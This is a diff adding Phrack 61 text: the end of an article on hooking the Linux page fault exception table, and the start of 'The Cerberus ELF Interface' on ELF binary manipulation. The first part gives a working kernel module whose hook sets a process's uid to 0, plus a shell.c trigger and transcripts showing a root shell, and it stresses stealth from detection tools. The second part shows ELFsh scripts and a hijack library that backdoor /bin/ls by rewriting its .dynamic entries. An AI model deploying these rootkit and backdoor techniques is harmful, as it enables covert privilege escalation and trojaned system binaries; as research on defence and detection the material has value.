+ * Author: Angelo Dell'Aera 'buffer' - buffer@antifork.org
+ *
+ * This program is free software; you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation; either version 2 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, write to the Free Software
+ * Foundation, Inc., 59 Temple Place, Suite 330, Boston,
+ * MA  02111-1307  USA
+ */
+
+#ifndef __KERNEL__
+#define __KERNEL__
+#endif
+
+#ifndef MODULE
+#define MODULE
+#endif
+
+#define __START___EX_TABLE 0xc0261e20
+#define __END___EX_TABLE   0xc0264548
+#define BAD_GET_USER       0xc022f39c
+
+unsigned long start_ex_table = __START___EX_TABLE;
+unsigned long end_ex_table = __END___EX_TABLE;
+unsigned long bad_get_user = BAD_GET_USER;
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/slab.h>
+
+#ifdef FIXUP_DEBUG
+#  define PDEBUG(fmt, args...) printk(KERN_DEBUG "[fixup] : " fmt, ##args)
+#else
+#  define PDEBUG(fmt, args...) do {} while(0)
+#endif
+
+MODULE_PARM(start_ex_table, "l");
+MODULE_PARM(end_ex_table, "l");
+MODULE_PARM(bad_get_user, "l");
+
+
+struct old_ex_entry {
+        struct old_ex_entry     *next;
+        unsigned long           address;
+        unsigned long           insn;
+        unsigned long           fixup;
+};
+  
+struct old_ex_entry *ex_old_table;
+
+void hook(void) 
+{
+        printk(KERN_INFO "Oh Jesus... it works!\n");
+} 
+
+void cleanup_module(void)
+{
+        struct old_ex_entry     *entry = ex_old_table;
+        struct old_ex_entry     *tmp;
+
+        if (!entry)
+                return;
+
+        while (entry) {
+                *(unsigned long *)entry->address = entry->insn;
+                *(unsigned long *)((entry->address) + sizeof(unsigned
+long)) = entry->fixup;
+                tmp = entry->next;
+                kfree(entry);
+                entry = tmp;
+        }
+
+        return;
+}
+
+
+int init_module(void)
+{
+        unsigned long       insn = start_ex_table;
+        unsigned long       fixup;
+        struct old_ex_entry *entry, *last_entry;
+
+        ex_old_table = NULL;
+        PDEBUG(KERN_INFO "hook at address : %p\n", (void *)hook);
+
+        for(; insn < end_ex_table; insn += 2 * sizeof(unsigned long)) {
+
+                fixup = insn + sizeof(unsigned long);
+
+                if (*(unsigned long *)fixup == BAD_GET_USER) {
+
+                        PDEBUG(KERN_INFO "address : %p insn: %lx fixup : %lx\n",
+                                        (void *)insn, *(unsigned long *)insn,
+                                        *(unsigned long *)fixup);
+        
+                        entry = (struct old_ex_entry *)kmalloc(GFP_ATOMIC,
+					sizeof(struct old_ex_entry));
+        
+                        if (!entry)
+                                return -1;
+
+                        entry->next = NULL;
+                        entry->address = insn;
+                        entry->insn = *(unsigned long *)insn;
+                        entry->fixup = *(unsigned long *)fixup;
+
+                        if (ex_old_table) {
+                                last_entry = ex_old_table;
+        
+                        	while(last_entry->next != NULL)
+                                	last_entry = last_entry->next;
+
+                                last_entry->next = entry;
+                        } else
+                                ex_old_table = entry;
+                
+                        *(unsigned long *)fixup = (unsigned long)hook;
+                
+                        PDEBUG(KERN_INFO "address : %p insn: %lx fixup : %lx\n",
+                                        (void *)insn, *(unsigned long *)insn,
+                                        *(unsigned long *)fixup);
+
+
+                }
+
+        }
+
+        return 0;
+}
+        
+MODULE_LICENSE("GPL");
+
+-------------------------------------------------------------------------
+
+
+
+And now a simple code which calls ioctl(2) with a bad argument.
+
+
+
+---------------- [ test.c ]----------------------------------------------
+
+
+/*
+ * Filename: test.c
+ * Creation date: 23.05.2003
+ * Author: Angelo Dell'Aera 'buffer' - buffer@antifork.org
+ *
+ * This program is free software; you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation; either version 2 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, write to the Free Software
+ * Foundation, Inc., 59 Temple Place, Suite 330, Boston,
+ * MA  02111-1307  USA
+ */
+
+
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <errno.h>
+#include <sys/ioctl.h>
+
+int main()
+{
+        int     fd;
+        int     res;
+
+        fd = open("testfile", O_RDWR | O_CREAT, S_IRWXU);
+        res = ioctl(fd, FIONBIO, NULL);
+        printf("result = %d errno = %d\n", res, errno);
+        return 0;
+}
+
+-------------------------------------------------------------------------
+
+
+Ok let's look if it works.
+
+
+buffer@rigel:~$ gcc -I/usr/src/linux/include -O2 -Wall -c exception.c 
+buffer@rigel:~$ gcc -o test test.c
+buffer@rigel:~$ ./test 
+result = -1 errno = 14
+
+
+As we expected, we got an EFAULT error (errno = 14). 
+Let's try to link our module now.
+
+
+buffer@rigel:~$ su 
+Password: 
+bash-2.05b# insmod exception.o
+bash-2.05b# exit
+buffer@rigel:~$ ./test 
+result = 25 errno = 0
+buffer@rigel:~$ 
+
+
+Looking at /var/log/messages
+
+
+bash-2.05b# tail -f /usr/adm/messages
+[..]
+May 23 21:31:56 rigel kernel: Oh Jesus... it works!
+
+
+Seems it works fine! :)
+What can we do now?! Try to take a look at this!
+
+Just changing the previous hook() function with this simple one
+
+
+	void hook(void) 
+	{
+        	current->uid = current->euid = 0;
+	}
+
+
+and using this user space code for triggering the page fault handler
+
+
+
+------------ shell.c -----------------------------------------------------
+
+
+/*
+ * Filename: shell.c
+ * Creation date: 23.05.2003
+ * Author: Angelo Dell'Aera 'buffer' - buffer@antifork.org
+ *
+ * This program is free software; you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation; either version 2 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, write to the Free Software
+ * Foundation, Inc., 59 Temple Place, Suite 330, Boston,
+ * MA  02111-1307  USA
+ */
+
+
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <errno.h>
+#include <sys/ioctl.h>
+
+int main()
+{
+        int     fd;
+        int     res;
+        char    *argv[2];
+
+        argv[0] = "/bin/sh";
+        argv[1] = NULL;
+
+        fd = open("testfile", O_RDWR | O_CREAT, S_IRWXU);
+        res = ioctl(fd, FIONBIO, NULL);
+        printf("result = %d errno = %d\n", res, errno);
+        execve(argv[0], argv, NULL);
+        return 0;
+}
+
+--------------------------------------------------------------------------
+
+
+buffer@rigel:~$ su  
+Password: 
+bash-2.05b# insmod exception.o 
+bash-2.05b# exit
+buffer@rigel:~$ gcc -o shell shell.c 
+buffer@rigel:~$ id
+uid=500(buffer) gid=100(users) groups=100(users)
+buffer@rigel:~$ ./shell 
+result = 25 errno = 0
+sh-2.05b# id
+uid=0(root) gid=100(users) groups=100(users)
+sh-2.05b# 
+
+
+Really nice, isn't it? :)
+
+This is just an example of what you can do. Using this LKM, you are able
+to execute anything as if you were root. Do you need something else? Well
+what you need is simply modifying hook() and/or user space code which
+raises Page Fault exception... it's up to your fantasy now! 
+
+
+
+-- [ 5 - Further Considerations
+
+
+When this idea came to my mind I wasn't able to realize what I really did.
+It came out just as the result of an intellectual masturbation. Just few 
+hours later I understood...
+
+Think about what you need for changing an entry in the syscall table for
+redirecting a system call. Or think about what you need for modifying the
+first 7 bytes of a syscall code as outlined by Silvio. What you need is
+simply a "reference mark". Here, your "reference mark" is the exported
+symbol sys_call_table in both cases. But, unfortunately, you're not the
+only one who knows it. Detection tools can easily know it (since it's an
+exported symbol) and so it's quite simple for them to detect changes in
+the syscall table and/or in the system call code.
+
+What if you want to modify the Interrupt Descriptor Table as outlined by
+kad? You need a "reference mark" as well. In this case, the "reference
+mark" is the IDT address in the kernel memory. But this address is easy to
+retrieve too and what a detection tool needs to obtain it is simply this
+
+
+	long long idtr; 
+	long __idt_table;
+
+	__asm__ __volatile__("sidt %0\n" : : "m"(idtr)); 
+	__idt_table = idtr >> 16;
+
+
+As result, __idt_table will store the IDT address thus easily obtaining the
+"reference mark" to the IDT. This is done through using sidt asm
+instruction. AngeL, in its latest development releases 0.9.x, uses this
+approach and it's able to detect in real-time an attack based on what
+stated in [7].
+
+Now think again about what I discussed in the previous sections. It's easy
+to understand that obtaining a "reference mark" to the page fault
+exception table is not so straightforward as in the previous cases. 
+
+The only way for retrieving the page fault exception table address is 
+through System.map file. 
+
+While writing a detection tool whose aim is to detect this kind of attack,
+making the assumption that the System.map file refers to the currently
+running kernel could be counterproductive. In fact, if it weren't true,
+the detection tool could start monitor addresses where not important
+(obviously for the purposes of this article) kernel data reside.
+
+Remember that it's easy to generate a System.map file through using nm(2)
+but there are a lot of systems out there whose administrators simply
+ignore the role of System.map and don't maintain it synchronized with the
+currently running kernel.  
+
+
+
+-- [ 6 - Conclusions
+
+
+Modifying the page fault handler exception table is quite simple as we
+realized. Moreover, it is really stealth since it's possible to obtain
+great results just modifying 4 bytes in the kernel memory. In my proof of
+concept code, for the sake of simplicity, I modified 12 bytes but it's
+easy to realize that it's possible to obtain the same result just
+modifying the __get_user_4() fixup code address.
+
+Moreover, it's difficult to find out there programs with bugs of this kind
+which raise this kind of behaviour. Remember that for raising this
+behaviour you have to pass a wrong address to a syscall. How many programs
+doing this have you seen? I think that this kind of approach is really
+stealth since this situation is never encountered. In fact, these are bugs
+that, if present, are usually corrected by the author before distributing
+their programs. The kernel must implement the approach outlined before but
+it usually never needs to execute it. 
+
+
+
+
+-- [ 7 - Thanks
+
+
+Many thanks to Antifork Research guys... really cool to work with you! 
+
+
+
+
+-- [ 8 - References
+
+
+ [1] "Understanding the Linux Kernel"
+     Daniel P. Bovet and Marco Cesati
+     O'Reilly 
+
+ [2] "Linux Device Drivers"
+      Alessandro Rubini and Jonathan Corbet
+      O'Reilly 
+
+ [3] Linux kernel source
+     [http://www.kernel.org]
+
+ [4] "Syscall Redirection Without Modifying the Syscall Table"
+     Silvio Cesare
+     [http://www.big.net.au/~silvio/]
+    
+ [5] Kstat
+     [http://www.s0ftpj.org/en/tools.html]
+
+ [6] AngeL
+     [http://www.sikurezza.org/angel]
+
+ [7] "Handling Interrupt Descriptor Table for Fun and Profit"
+     kad 
+     Phrack59-0x04
+     [http://www.phrack.org]
+
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack61/8.txt b/phrack61/8.txt
new file mode 100644
index 0000000..6cbf609
--- /dev/null
+++ b/phrack61/8.txt
@@ -0,0 +1,1677 @@
+			      ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3d, Phile #0x08 of 0x0f
+
+|=---------- .:: Devhell Labs and Phrack Magazine present ::. ----------=|
+|=----------------------------------------------------------------------=|
+|=------------------=[  The Cerberus ELF Interface  ]=------------------=|
+|=----------------------------------------------------------------------=|
+|=------------------=[  mayhem <mayhem@devhell.org> ]=------------------=|
+
+
+ 1. Introduction
+ 2. Quick and usable backdoor in 4 bytes
+    a/ The .dynamic section
+    b/ DT_NEEDED and DT_DEBUG entries
+    c/ Performing function hijacking
+    d/ Example 1: ls and opendir()
+ 3. Residency : ET_REL injection into ET_EXEC
+    a/ Section injection : pre-interp vs post-bss
+    b/ Multiple BSS merging
+    c/ Symbol tables merging
+    d/ Mixing (a,b,c) for injecting a module into an executable
+    e/ Example 2: sshd and crypt()
+    f/ Multi-architecture algorithms
+    g/ ELFsh 0.51b relocation engine implementation details
+ 4. Infection : ALTPLT technique
+    a/ Foundations of ALTPLT
+    b/ ALTPLT on SPARC
+    c/ Example 3: md5sum and fopen64()
+    d/ Multi-architecture algorithm			
+    e/ Improvement suggestions for the redir command
+ 5. The end ?
+ 6. Greets
+ 7. References
+
+
+-------[ 1. Introduction
+
+
+	 This article introduces three new generic techniques in ELF
+	 (Executable and Linking Format) objects manipulation. The first
+	 presented one is designed to be simple and quickly implemented,
+	 others are more complex and allow advanced software extension
+	 without having the source tree. These techniques can be used for
+	 a wide panel of requirements such as closed-source software
+	 debugging, software extension, backdooring, virii writing, 
+	 intrusion detection and intrusion prevention.
+
+	 The examples will make use of the ELF shell [1], a freely
+	 available scripting language to modify ELF binaries. It works
+	 on two architectures (INTEL and SPARC) and four operating
+	 systems (Linux, NetBSD, FreeBSD, and Solaris). Moreover the
+	 techniques work even if the target machine is installed with
+	 address space randomization and execution restriction, such as
+	 PaX [2] protected boxes, since all the code injection is done
+	 in the allowed areas. 
+
+	 ELF basics -will not- be explained, if you have troubles 
+	 understanding the article, please read the ELF TIS [3] reference
+	 before requesting extra details ;). You can also try another
+	 resource [4] which is a good introduction to the ELF format, 
+	 from the virus writing perspective.
+
+	 In the first part of the paper, an easy and pragmatic technique 
+	 for backdooring an executable will be described, just by
+	 changing 4 bytes. It consists of corrupting the .dynamic section 
+	 of the binary (2) and erase some entries (DT_DEBUG) for adding 
+	 others (DT_NEEDED), plus swapping existing DT_NEEDED entries to 
+	 give priority to certain symbols, all of this without changing 
+	 the file size.
+
+	 The second part describes a complex residency technique, which 
+	 consists of adding a module (relocatable object ET_REL, e.g. a
+	 .o file) into an executable file (ET_EXEC) as if the binary was
+	 not linked yet. This technique is provided for INTEL and SPARC
+	 architectures : compiled C code can thus be added permanently
+	 to any ELF32 executable.
+
+	 Finally, a new infection technique called ALTPLT (4) will be
+	 explained. This feature is an extension of PLT infection [5]
+	 and works in correlation with the ET_REL injection. It consists
+	 of duplicating the Procedure Linkage Table and inject symbols
+	 onto each entry of the alternate PLT. The advantages of this
+	 technique are the relative portability (relative because we will
+	 see that minor architecture dependant fixes are necessary), its
+	 PaX safe bevahior as well, and the ability to call the original
+	 function from the hook function without having to perform
+	 painful tasks like runtime byte restoration.
+
+	 Example ELFsh scripts are provided for all the explained
+	 techniques. However, no ready-to-use backdoors will be included 
+	 (do you own!). For peoples who did not want to see these
+	 techniques published, I would just argue that all of
+	 them have been available for a couple of months for those
+	 who wanted, and new techniques are already in progress. These
+	 ideas were born from a good exploitation of the information
+	 provided in the ELF reference and nothing was ripped to anyone.
+	 I am not aware of any implementation providing these features,
+	 but if you feel injuried, you can send flame emails and my
+	 bot^H^H^H^H^H^H I will kindly answer all of them.
+
+
+-------[ 2. Quick and usable backdoor in 4 bytes
+
+
+	 Every dynamic executable file contains a .dynamic section. This 
+	 zone is useful for the runtime linker in order to access crucial
+	 information at runtime without requiring a section header table
+	 (SHT), since the .dynamic section data  matches the bounds of
+	 the PT_DYNAMIC segment entry of the Program Header Table (PHT).
+	 Useful information includes the address and size of relocation
+	 tables, the addresses of initialization and destruction routines,
+	 the addresses of version tables, pathes for needed libraries, and
+	 so on. Each entry of .dynamic looks like this, as shown in elf.h :
+
+
+	 typedef struct
+	 {
+	   Elf32_Sword   d_tag;                 /* Dynamic entry type */
+	   union
+	    {
+	      Elf32_Word d_val;                 /* Integer value */
+	      Elf32_Addr d_ptr;                 /* Address value */
+	    } d_un;
+	  } Elf32_Dyn;
+
+
+	 For each entry, d_tag is the type (DT_*) and d_val (or d_ptr) is
+	 the related value. Let's use the elfsh '-d' option to print the
+	 dynamic section:
+
+
+ -----BEGIN EXAMPLE 1-----
+ $ elfsh -f /bin/ls -d 
+
+  [*] Object /bin/ls has been loaded (O_RDONLY) 
+
+  [SHT_DYNAMIC]
+  [Object /bin/ls]
+
+  [00] Name of needed library          =>  librt.so.1 {DT_NEEDED}
+  [01] Name of needed library          =>   libc.so.6 {DT_NEEDED}
+  [02] Address of init function        =>  0x08048F88 {DT_INIT}
+  [03] Address of fini function        =>  0x0804F45C {DT_FINI}
+  [04] Address of symbol hash table    =>  0x08048128 {DT_HASH}
+  [05] Address of dynamic string table =>  0x08048890 {DT_STRTAB}
+  [06] Address of dynamic symbol table =>  0x08048380 {DT_SYMTAB}
+  [07] Size of string table            =>   821 bytes {DT_STRSZ}
+  [08] Size of symbol table entry      =>    16 bytes {DT_SYMENT}
+  [09] Debugging entry (unknown)       =>  0x00000000 {DT_DEBUG}
+  [10] Processor defined value         =>  0x0805348C {DT_PLTGOT}
+  [11] Size in bytes for .rel.plt      =>   560 bytes {DT_PLTRELSZ}
+  [12] Type of reloc in PLT            =>          17 {DT_PLTREL}
+  [13] Address of .rel.plt             =>  0x08048D58 {DT_JMPREL}
+  [14] Address of .rel.got section     =>  0x08048D20 {DT_REL}
+  [15] Total size of .rel section      =>    56 bytes {DT_RELSZ}
+  [16] Size of a REL entry             =>     8 bytes {DT_RELENT}
+  [17] SUN needed version table        =>  0x08048CA0 {DT_VERNEED}
+  [18] SUN needed version number       =>           2 {DT_VERNEEDNUM}
+  [19] GNU version VERSYM              =>  0x08048BFC {DT_VERSYM}
+
+  [*] Object /bin/ls unloaded 
+
+ $
+ -----END EXAMPLE 1-----
+ 
+
+	 The careful reader would have noticed a strange entry of type 
+	 DT_DEBUG. This entry is used in the runtime linker to retrieve
+	 debugging information, it is present in all GNU tools generated
+	 binaries but it is not mandatory. The idea is to erase it using
+	 a forged DT_NEEDED, so that an extra library dependance is added
+	 to the executable.
+
+	 The d_val field of a DT_NEEDED entry contains a relative offset
+	 from the beginning of the .dynstr section, where we can find the
+	 library path for this entry. What happens if we want to avoid
+	 injecting an extra library path string into the .dynstr
+	 section ?
+
+
+ -----BEGIN EXAMPLE 2-----
+ $ elfsh -f /bin/ls -X dynstr | grep so
+ .dynstr + 16  6C69 6272 742E 736F 2E31 0063 6C6F 636B librt.so.1.clock
+ .dynstr + 48  696E 5F75 7365 6400 6C69 6263 2E73 6F2E in_used.libc.so.
+ .dynstr + 176 726E 616C 0071 736F 7274 006D 656D 6370 rnal.qsort.memcp
+ .dynstr + 784 6565 006D 6273 696E 6974 005F 5F64 736F ee.mbsinit.__dso
+ $
+ -----END EXAMPLE 2-----
+
+
+	 We just have to choose an existing library path string, but 
+	 avoid starting at the beginning ;). The ELF reference specifies
+	 clearly that a same string in .dynstr can be used by multiple
+	 entries at a time:
+
+
+ -----BEGIN EXAMPLE 3-----
+ $ cat > /tmp/newlib.c 
+ function()
+ {
+   printf("my own fonction \n");
+ }
+ $ gcc -shared /tmp/newlib.c -o /lib/rt.so.1
+ $ elfsh
+
+  Welcome to The ELF shell 0.5b9 .::. 
+
+  .::. This software is under the General Public License 
+  .::. Please visit http://www.gnu.org to know about Free Software 
+
+ [ELFsh-0.5b9]$ load /bin/ls 
+   [*] New object /bin/ls loaded on Mon Apr 28 23:09:55 2003
+
+ [ELFsh-0.5b9]$ d DT_NEEDED|DT_DEBUG
+
+ [SHT_DYNAMIC]
+ [Object /bin/ls]
+
+ [00] Name of needed library            =>          librt.so.1 {DT_NEEDED}
+ [01] Name of needed library            =>           libc.so.6 {DT_NEEDED}
+ [09] Debugging entry (unknown)         =>          0x00000000 {DT_DEBUG}
+
+ [ELFsh-0.5b9]$ set 1.dynamic[9].tag DT_NEEDED
+  [*] Field set succesfully 
+
+ [ELFsh-0.5b9]$ set 1.dynamic[9].val 19	# see .dynstr + 19
+  [*] Field set succesfully 
+
+ [ELFsh-0.5b9]$ save /tmp/ls.new
+  [*] Object /tmp/ls.new saved successfully
+
+ [ELFsh-0.5b9]$ quit
+  [*] Unloading object 1 (/bin/ls) * 
+
+  Good bye ! .::. The ELF shell 0.5b9 
+
+ $ 
+ -----END EXAMPLE 3-----
+
+	 
+	 Lets verify our changes:
+
+
+ -----BEGIN EXAMPLE 4-----
+ $ elfsh -f ls.new -d DT_NEEDED
+
+ [*] Object ls.new has been loaded (O_RDONLY) 
+
+ [SHT_DYNAMIC]
+ [Object ls.new]
+ 
+ [00] Name of needed library            =>          librt.so.1 {DT_NEEDED}
+ [01] Name of needed library            =>           libc.so.6 {DT_NEEDED}
+ [09] Name of needed library            =>             rt.so.1 {DT_NEEDED}
+
+ [*] Object ls.new unloaded 
+
+ $ ldconfig		     # refresh /etc/ld.so.cache
+ $ 
+ -----END EXAMPLE 4-----
+
+
+	 This method is not extremely stealth because a simple command can
+	 list all the library dependances for a given binary:
+
+
+ $ ldd /tmp/ls.new
+         librt.so.1 => /lib/librt.so.1 (0x40021000)
+	 libc.so.6 => /lib/libc.so.6 (0x40033000)
+	 rt.so.1 => /lib/rt.so.1 (0x40144000)
+	 libpthread.so.0 => /lib/libpthread.so.0 (0x40146000)
+	 /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
+ $ 
+
+
+	 Is the executable still working?
+
+
+ $ ./ls.new
+ AcroOlAAFj  ELFSH_DEBUG  ls.new  newlib.c
+ $ 
+
+
+	 OK, so we found a good way to inject as much code as we want in
+	 a process, by adding a library dependance to the main object, the
+	 executable object. Now what if we want to hijack functions with
+	 such an easy technique? We can force some symbols to get resolved
+	 in priority over other symbols : when the runtime relocation is 
+	 done (when the .got section is patched), the runtime linker will
+	 iterate on the link_map [6] [7] [8] list, find the first matching
+	 symbol, and fill the Global Offset Table related entry (or the 
+	 Procedure Linkage Table entry if we are on SPARC) with the 
+	 absolute runtime address where the function is mapped. A simple 
+	 technique consists of swapping DT_NEEDED entries and make our own
+	 library to be present before other libraries in the link_map
+	 double linked list, and symbols to be resolved before the
+	 original symbols. In order to call the original function from
+	 the hook function, we will have to use dlopen(3) and dlsym(3) so
+	 that we can resolve a symbol for a given object.
+
+	 Lets take the same code, and this time, write a script which can
+	 hijack opendir(3) to our own function(), and then call the 
+	 original opendir(), so that the binary can be run normally:
+
+
+ -----BEGIN EXAMPLE 5-----
+ $ cat dlhijack.esh
+ #!/usr/bin/elfsh
+ 
+ load /bin/ls
+
+ # Move DT_DEBUG into DT_NEEDED
+ set 1.dynamic[9].tag DT_NEEDED
+
+ # Put the former DT_DEBUG entry value to the first DT_NEEDED value
+ set 1.dynamic[9].val 1.dynamic[0].val
+
+ # Add 3 to the first DT_NEEDED value => librt.so.1 becomes rt.so.1 
+ add 1.dynamic[0].val 3
+
+ save ls.new
+ quit
+
+ $ 
+ -----END EXAMPLE 5-----
+
+
+	 Now let's write the opendir hook code:
+
+
+ -----BEGIN EXAMPLE 6-----
+ $ cat myopendir.c
+ #include <stdio.h>
+ #include <sys/types.h>
+ #include <stdlib.h>
+ #include <fcntl.h>
+ #include <dirent.h>
+ #include <dlfcn.h>
+
+ #define LIBC_PATH       "/lib/libc.so.6"
+
+ DIR     *opendir(const char *name)
+ {
+   void  *handle;
+   void  *(*sym)(const char *name);
+
+   handle = dlopen(LIBC_PATH, RTLD_LAZY);
+   sym = (void *) dlsym(handle, "opendir");
+   printf("OPENDIR HIJACKED -orig- = %08X .::. -param- = %s \n", 
+			   sym, name);
+   return (sym(name));
+ }
+ $ gcc -shared myopendir.c -o rt.so.1 -ldl
+ $
+ -----END EXAMPLE 6-----
+
+
+	 Now we can modify the binary using our 4 lines script:
+
+
+ -----BEGIN EXAMPLE 7-----
+ $ ./dlhijack.esh
+
+   Welcome to The ELF shell 0.5b9 .::. 
+
+   .::. This software is under the General Public License 
+   .::. Please visit http://www.gnu.org to know about Free Software 
+
+   ~load /bin/ls
+     [*] New object /bin/ls loaded on Fri Jul 25 02:48:19 2003
+ 
+   ~set 1.dynamic[9].tag DT_NEEDED
+     [*] Field set succesfully 
+
+   ~set 1.dynamic[9].val 1.dynamic[0].val
+     [*] Field set succesfully 
+
+   ~add 1.dynamic[0].val 3
+     [*] Field modified succesfully
+
+   ~save ls.new
+     [*] Object ls.new save successfully 
+
+    ~quit
+     [*] Unloading object 1 (/bin/ls) * 
+
+  Good bye ! .::. The ELF shell 0.5b9 
+
+ $
+ -----END EXAMPLE 7-----
+
+
+	Let's see the results for the original ls, and then for the
+	modified ls:
+
+
+ $ ldd ls.new
+        rt.so.1 => /lib/rt.so.1 (0x40021000)
+        libc.so.6 => /lib/libc.so.6 (0x40023000)
+        librt.so.1 => /lib/librt.so.1 (0x40134000)
+        libdl.so.2 => /lib/libdl.so.2 (0x40146000)
+        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
+        libpthread.so.0 => /lib/libpthread.so.0 (0x4014a000)
+ $ ls
+ c.so.6  dlhijack.esh  dlhijack.esh~  ls.new  myopendir.c  \
+ myopendir.c~  p61_ELF.txt  p61_ELF.txt~  rt.so.1
+ $ ./ls.new 
+ OPENDIR HIJACKED -orig- = 400C1D5C .::. -param- = . 
+ c.so.6  dlhijack.esh  dlhijack.esh~  ls.new  myopendir.c \
+ myopendir.c~  p61_ELF.txt  p61_ELF.txt~  rt.so.1
+ $
+
+
+	Nice. Note that the current implementation of this technique in 
+	ELFsh changes the size of the binary because it injects 
+	automatically some symbols for binary sanity. If you want to keep 
+	the same size, you have to comment the calls to elfsh_fixup_symtab
+	in the ELFsh source code ;) . This stuff is known to be used
+	in the wild.
+
+	The dynamic version of this technique has been proposed in [9],
+	where the author describes how to call dlopen() in a subversive
+	way, so that the process get runtime linked with an extra library.
+	In practice, both implementations have nothing in common, but it
+	is worth mentionning.
+
+
+-------[ 3. Residency : ET_REL injection into ET_EXEC
+
+
+	 This second technique allows to perform relinking of the ELF
+	 ET_EXEC binary file and adding a relocatable object (ET_REL
+	 file aka .o file) into the program address space. This is very
+	 useful since it is a powerful method to inject as much data and
+	 code as needed in a file using a 5 lines script.
+
+	 Such relocation based backdoors have been developped in the 
+	 past for static kernel patching [10] (ET_REL into vmlinuz) and
+	 direct LKM loading in kernel memory (ET_REL into kmem) [11] .
+	 However, this ET_REL injection into ET_EXEC implementation is in
+	 my sense particulary interresting since it has been implemented 
+	 considering a larger scope of target architectures and for
+	 protected environments.
+
+	 Because ELFsh is also used for things other than backdooring, 
+	 the SHT and the symbol table are kept synchronized when we
+	 insert our stuff into the binary, so that symbol resolving can
+	 be provided even in the injected code.
+
+	 Since the backdoor needs to stay valid on a PaX protected box,
+	 we use 2 different injection techniques (one for the code 
+	 sections, the other for the data sections) called section
+	 pre-interp injection (because we insert the new section before
+	 the .interp section) and section post-bss injection (because we
+	 insert the new section after the .bss section).
+
+	 For this second injection type, .bss data physical insertion 
+	 into the file is necessary, since .bss is the non-initialized 
+	 data section, it is only referenced by the SHT and PHT, but it
+	 is not present in the file.
+
+	 Also, note that section pre-interp injection is not possible 
+	 with the current FreeBSD dynamic linker (some assert() kills the
+	 modified binary), so all sections are injected using a post-bss 
+	 insertion on this OS. This is not an issue since FreeBSD does not
+	 come with non-executable protection for datapages. If such a 
+	 protection comes in the future, we would have to modify the 
+	 dynamic linker itself before being able to run the modified
+	 binary, or make the code segment writable in sh_flags.
+
+	 Let's look at the binary layout (example is sshd, it is the same
+	 for all the binaries) :
+
+
+ -----BEGIN EXAMPLE 8-----
+ $ elfsh -f /usr/sbin/sshd -q -s -p
+
+[SECTION HEADER TABLE .::. SHT is not stripped]
+[Object /usr/sbin/sshd]
+
+[000] (nil)      -------                 foff:00000000 sz:00000000 link:00
+[001] 0x80480f4  a------ .interp         foff:00000244 sz:00000019 link:00
+[002] 0x8048108  a------ .note.ABI-tag   foff:00000264 sz:00000032 link:00
+[003] 0x8048128  a------ .hash           foff:00000296 sz:00001784 link:04
+[004] 0x8048820  a------ .dynsym         foff:00002080 sz:00003952 link:05
+[005] 0x8049790  a------ .dynstr         foff:00006032 sz:00002605 link:00
+[006] 0x804a1be  a------ .gnu.version    foff:00008638 sz:00000494 link:04
+[007] 0x804a3ac  a------ .gnu.version_r  foff:00009132 sz:00000096 link:05
+[008] 0x804a40c  a------ .rel.got        foff:00009228 sz:00000008 link:04
+[009] 0x804a414  a------ .rel.bss        foff:00009236 sz:00000056 link:04
+[010] 0x804a44c  a------ .rel.plt        foff:00009292 sz:00001768 link:04
+[011] 0x804ab34  a-x---- .init           foff:00011060 sz:00000037 link:00
+[012] 0x804ab5c  a-x---- .plt            foff:00011100 sz:00003552 link:00
+[013] 0x804b940  a-x---- .text           foff:00014656 sz:00145276 link:00
+[014] 0x806f0bc  a-x---- .fini           foff:00159932 sz:00000028 link:00
+[015] 0x806f0e0  a------ .rodata         foff:00159968 sz:00068256 link:00
+[016] 0x8080b80  aw----- .data           foff:00228224 sz:00003048 link:00
+[017] 0x8081768  aw----- .eh_frame       foff:00231272 sz:00000004 link:00
+[018] 0x808176c  aw----- .ctors          foff:00231276 sz:00000008 link:00
+[019] 0x8081774  aw----- .dtors          foff:00231284 sz:00000008 link:00
+[020] 0x808177c  aw----- .got            foff:00231292 sz:00000900 link:00
+[021] 0x8081b00  aw----- .dynamic        foff:00232192 sz:00000200 link:05
+[022] 0x8081bc8  -w----- .sbss           foff:00232416 sz:00000000 link:00
+[023] 0x8081be0  aw----- .bss            foff:00232416 sz:00025140 link:00
+[024] (nil)      ------- .comment        foff:00232416 sz:00002812 link:00
+[025] (nil)      ------- .note           foff:00235228 sz:00001480 link:00
+[026] (nil)      ------- .shstrtab       foff:00236708 sz:00000243 link:00
+[027] (nil)      ------- .symtab         foff:00236951 sz:00000400 link:00
+[028] (nil)      ------- .strtab         foff:00237351 sz:00000202 link:00
+
+[Program header table .::. PHT]
+[Object /usr/sbin/sshd]
+
+[0] 0x08048034 -> 0x080480F4 r-x memsz(000192) foff(000052) filesz(000192)
+[1] 0x080480F4 -> 0x08048107 r-- memsz(000019) foff(000244) filesz(000019)
+[2] 0x08048000 -> 0x0807FB80 r-x memsz(228224) foff(000000) filesz(228224)
